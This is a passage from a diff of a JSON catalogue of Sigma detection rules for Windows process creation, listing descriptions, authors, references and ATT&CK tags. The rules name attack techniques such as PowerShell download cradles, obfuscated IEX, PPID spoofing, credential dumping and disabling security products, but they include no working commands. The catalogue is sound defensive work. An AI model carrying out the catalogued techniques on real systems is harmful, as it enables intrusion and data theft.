"https://redcanary.com/threat-detection-report/", + "https://www.cobaltstrike.com/help-windows-executable", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.011" ] }, - "uuid": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", - "value": "Disabled Volume Snapshots" + "uuid": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", + "value": "CobaltStrike Load by Rundll32" }, { - "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", - "meta": { - "author": "bohops", - "creation_date": "2022/10/30", - "falsepositive": [ - "False positives depend on custom use of vsls-agent.exe" - ], - "filename": "proc_creation_win_susp_vslsagent_agentextensionpath_load.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/bohops/status/1583916360404729857", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vslsagent_agentextensionpath_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "43103702-5886-11ed-9b6a-0242ac120002", - "value": "Suspicious Vsls-Agent Command With AgentExtensionPath Load" - }, - { - "description": "A General detection for svchost.exe spawning rundll32.exe with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_webdav_client_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - 
"refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/17", - "https://threathunterplaybook.com/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_webdav_client_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ] - }, - "uuid": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", - "value": "Suspicious WebDav Client Execution" - }, - { - "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", + "description": "Detects suspicious ways to download files or content using PowerShell", "meta": { "author": "Florian Roth", - "creation_date": "2022/08/26", + "creation_date": "2022/03/24", "falsepositive": [ - "Unknown" + "Scripts or tools that download files" ], - "filename": "proc_creation_win_susp_web_sysaidserver.yml", + "filename": "proc_creation_win_susp_powershell_download_cradles.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_sysaidserver.yml" + "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml" ], "tags": "No established tags" }, - "uuid": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", - "value": "Suspicious SysAidServer Child" + "uuid": "6e897651-f157-4d8f-aaeb-df8151488385", + "value": "PowerShell Web Download" }, { - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / 
children, execution folders, command lines etc.", + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.", "meta": { - "author": "Florian Roth", - "creation_date": "2022/10/14", + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", "falsepositive": [ - "Unknown" + "Admin activity" ], - "filename": "proc_creation_win_susp_wermgr.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", - "https://www.echotrail.io/insights/search/wermgr.exe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml" - ], - "tags": "No established tags" - }, - "uuid": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", - "value": "Suspicious WERMGR Process Patterns" - }, - { - "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) 
as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2021/12/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_where_execution.yml", + "filename": "proc_creation_win_network_sniffing.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_where_execution.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_sniffing.yml" ], "tags": [ + "attack.credential_access", "attack.discovery", - "attack.t1217" + "attack.t1040" ] }, - "uuid": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", - "value": "Suspicious Where Execution" + "uuid": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", + "value": "Network Sniffing" }, { - "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation but rarely used by administrators", + "description": "Detects a suspicious parents of powershell.exe", "meta": { - "author": "Florian Roth", - "creation_date": "2018/08/13", + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "creation_date": "2020/03/20", "falsepositive": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Other scripts" ], - "filename": "proc_creation_win_susp_whoami.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", - "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" - ] - }, - "uuid": "e28a5a99-da44-436d-b7a0-2afc20a5f413", - "value": "Whoami Execution" - }, - { - "description": "Detects the execution of whoami with suspicious parents or parameters", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/08/12", - "falsepositive": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" - ], - "filename": "proc_creation_win_susp_whoami_anomaly.yml", + "filename": "proc_creation_win_susp_powershell_parent_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", - "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", - "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml" + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_process.yml" ], "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.execution", + "attack.t1059.001" ] }, - "uuid": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", - "value": "Whoami Execution Anomaly" + "uuid": "754ed792-634f-40ae-b3bc-e0448d33f695", + "value": "Suspicious PowerShell Parent Process" }, { - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. 
used by EfsPotato)", + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", "meta": { "author": "Florian Roth", - "creation_date": "2021/11/29", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_whoami_as_param.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/blackarrowsec/status/1463805700602224645?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" - ] - }, - "uuid": "e9142d84-fbe0-401d-ac50-3e519fb00c89", - "value": "WhoAmI as Parameter" - }, - { - "description": "Detects a suspicious winrar execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/04", - "falsepositive": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" - ], - "filename": "proc_creation_win_susp_winrar_dmp.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ] - }, - "uuid": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", - "value": "Winrar Compressing Dump Files" - }, - { - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "meta": { - "author": "Florian Roth, Tigzy", - "creation_date": "2021/11/17", - "falsepositive": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" - ], - 
"filename": "proc_creation_win_susp_winrar_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/cyb3rops/status/1460978167628406785", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ] - }, - "uuid": "4ede543c-e098-43d9-a28f-dd784a13132f", - "value": "Winrar Execution in Non-Standard Folder" - }, - { - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "meta": { - "author": "Julia Fomina, oscd.community", - "creation_date": "2020/10/06", + "creation_date": "2022/07/23", "falsepositive": [ "Unlikely" ], - "filename": "proc_creation_win_susp_winrm_awl_bypass.yml", - "level": "medium", + "filename": "proc_creation_win_selectmyparent.yml", + "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_awl_bypass.yml" + "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", + "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", + "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", + "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_selectmyparent.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1134.004" ] }, - "uuid": "074e0ded-6ced-4ebd-8b4d-53f55908119d", - "value": "AWL Bypass with Winrm.vbs and Malicious 
WsmPty.xsl/WsmTxt.xsl" + "uuid": "52ff7941-8211-46f9-84f8-9903efb7077d", + "value": "PPID Spoofing Tool Usage" }, { - "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", - "meta": { - "author": "Julia Fomina, oscd.community", - "creation_date": "2020/10/07", - "falsepositive": [ - "Legitimate use for administartive purposes. Unlikely" - ], - "filename": "proc_creation_win_susp_winrm_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/bohops/status/994405551751815170", - "https://redcanary.com/blog/lateral-movement-winrm-wmi/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", - "value": "Remote Code Execute via Winrm.vbs" - }, - { - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", - "meta": { - "author": "frack113", - "creation_date": "2021/07/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_winzip.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winzip.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ] - }, - "uuid": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", - "value": "Compress Data and Lock With Password for Exfiltration With WINZIP" - }, - { - "description": "Detects WMIC executions in which a event consumer gets created in order to establish persistence", + "description": "Detects the execution of AdvancedRun 
utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", "meta": { "author": "Florian Roth", - "creation_date": "2021/06/25", - "falsepositive": [ - "Legitimate software creating script event consumers" - ], - "filename": "proc_creation_win_susp_wmic_eventconsumer_create.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.003" - ] - }, - "uuid": "ebef4391-1a81-4761-a40a-1db446c0e625", - "value": "Suspicious WMIC ActiveScriptEventConsumer Creation" - }, - { - "description": "Detects WMIC executing suspicious or recon commands", - "meta": { - "author": "Michael Haag, Florian Roth, juju4, oscd.community", - "creation_date": "2019/01/16", - "falsepositive": [ - "If using Splunk, we recommend | stats count by Computer,CommandLine following for easy hunting by Computer/CommandLine" - ], - "filename": "proc_creation_win_susp_wmic_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", - "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", - "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "car.2016-03-002" - ] - }, - "uuid": "526be59f-a573-4eea-b5f7-f0973207634d", - "value": 
"Suspicious WMIC Execution" - }, - { - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\"...etc", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2020/10/12", + "creation_date": "2022/01/20", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_wmic_proc_create.yml", + "filename": "proc_creation_win_susp_advancedrun_priv_user.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/10/08/ryuks-return/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", - "value": "Suspicious WMIC Execution - ProcessCallCreate" - }, - { - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2021/01/30", - "falsepositive": [ - "Legitimate administration" - ], - "filename": "proc_creation_win_susp_wmic_security_product_uninstall.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/cglyer/status/1355171195654709249", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_security_product_uninstall.yml" - ], - "tags": [ - "attack.defense_evasion", - 
"attack.t1562.001" - ] - }, - "uuid": "847d5ff3-8a31-4737-a970-aeae8fe21765", - "value": "Wmic Uninstall Security Product" - }, - { - "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", - "meta": { - "author": "Maxime Thiebaut (@0xThiebaut)", - "creation_date": "2021/10/21", - "falsepositive": [ - "Legitimate usage of the uncommon Windows Work Folders feature." - ], - "filename": "proc_creation_win_susp_workfolders.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/elliotkillick/status/1449812843772227588", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "0bbc6369-43e3-453d-9944-cae58821c173", - "value": "Execution via WorkFolders.exe" - }, - { - "description": "Detects code execution via the Windows Update client (wuauclt)", - "meta": { - "author": "FPT.EagleEye Team", - "creation_date": "2020/10/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_wuauclt.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://dtm.uk/wuauclt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" - ] - }, - "uuid": "d7825193-b70a-48a4-b992-8b5b3015cc11", - "value": "Windows Update Client LOLBIN" - }, - { - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_wuauclt_cmdline.yml", - "level": "high", - 
"logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml" + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", + "https://twitter.com/splinter_code/status/1483815103279603714", + "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml" ], "tags": "No established tags" }, - "uuid": "52d097e2-063e-4c9c-8fbb-855c8948d135", - "value": "Suspicious Windows Update Agent Empty Cmdline" + "uuid": "fa00b701-44c6-4679-994d-5a18afa8a707", + "value": "Suspicious AdvancedRun Runas Priv User" }, { - "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", + "description": "Detects an attempt to add a potentially crafted DLL as a plug in of the DNS Service.\nDetects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain.\nDNS zones used to host the DNS records for a particular domain\n", "meta": { - "author": "frack113", - "creation_date": "2021/11/07", + "author": "@gott_cyber", + "creation_date": "2022/07/31", "falsepositive": [ - "Unknown" + "Legitimate administration use" ], - "filename": "proc_creation_win_susp_zipexec.yml", + "filename": "proc_creation_win_dnscmd_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1451237393017839616", - "https://github.com/Tylous/ZipExec", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zipexec.yml" + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", + "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records", + "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1543.003" + ] + }, + "uuid": "b6457d63-d2a2-4e29-859d-4e7affc153d1", + "value": "Discovery/Execution via dnscmd.exe" + }, + { + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "meta": { + "author": "Austin Songer @austinsonger, Florian Roth", + "creation_date": "2021/11/26", + "falsepositive": [ + "Dump64.exe in other folders than the excluded one" + ], + "filename": "proc_creation_win_lolbin_dump64.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1460597833917251595", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "129966c9-de17-4334-a123-8b58172e664d", + "value": "Suspicious Dump64.exe Execution" + }, + { + "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", + "meta": { + "author": "frack113", + "creation_date": "2021/11/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_cmdl32.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SwiftOnSecurity/status/1455897435063074824", + "https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml" ], "tags": [ "attack.execution", 
@@ -55669,179 +44188,796 @@ "attack.t1202" ] }, - "uuid": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", - "value": "Suspicious ZipExec Execution" + "uuid": "f37aba28-a9e6-4045-882c-d5004043b337", + "value": "Suspicious Cmdl32 Execution" }, { - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "Commandline to launch powershell with a base64 payload", "meta": { "author": "frack113", - "creation_date": "2021/07/20", + "creation_date": "2022/01/02", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_zip_compress.yml", + "filename": "proc_creation_win_susp_powershell_encode.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zip_compress.yml" + "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", + "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml" ], "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.execution", + "attack.t1059.001" ] }, - "uuid": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", - "value": "Zip A Folder With PowerShell For Staging In Temp" + "uuid": "fb843269-508c-4b76-8b8d-88679db22ce7", + "value": "Suspicious Execution of Powershell with Base64" }, { - "description": "Threat actors can use auditpol binary to change audit policy configuration to 
impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", - "creation_date": "2021/02/02", + "author": "frack113", + "creation_date": "2022/02/11", "falsepositive": [ - "Admin activity" + "Legitimate use" ], - "filename": "proc_creation_win_sus_auditpol_usage.yml", + "filename": "proc_creation_win_anydesk.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "b52e84a3-029e-4529-b09b-71d19dd27e94", + "value": "Use of Anydesk Remote Access Software" + }, + { + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "meta": { + "author": "Mateusz Wydra, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Legitimate, non-default assistive technology applications execution" + ], + "filename": 
"proc_creation_win_lolbin_susp_atbroker.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sus_auditpol_usage.yml" + "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", + "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1218" ] }, - "uuid": "0a13e132-651d-11eb-ae93-0242ac130002", - "value": "Suspicious Auditpol Usage" + "uuid": "f24bcaea-0cd1-11eb-adc1-0242ac120002", + "value": "Suspicious Atbroker Execution" }, { - "description": "Detects the usage of Sysinternals Tools due to accepteula option being seen in the command line.", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", "meta": { - "author": "Markus Neis", - "creation_date": "2017/08/28", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", "falsepositive": [ - "Legitimate use of SysInternals tools", - "Programs that use the same Registry Key" + "Unknown" ], - "filename": "proc_creation_win_sysinternals_eula_accepted.yml", - "level": "low", + "filename": "proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml", + "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Moti_B/status/1008587936735035392", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml" + 
"https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml" ], "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ] }, - "uuid": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", - "value": "Usage of Sysinternals Tools" + "uuid": "4bf943c6-5146-4273-98dd-e958fd1e3abf", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation" }, { - "description": "Detects usage of Sysinternals PsService for service reconnaissance or tamper", + "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/16", + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/09", "falsepositive": [ - "Legitimate use of PsService by an administrator" + "Unlikely" ], - "filename": "proc_creation_win_sysinternals_psservice.yml", + "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psservice", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml" + "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", + "https://github.com/fireeye/DueDLLigence", + "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + 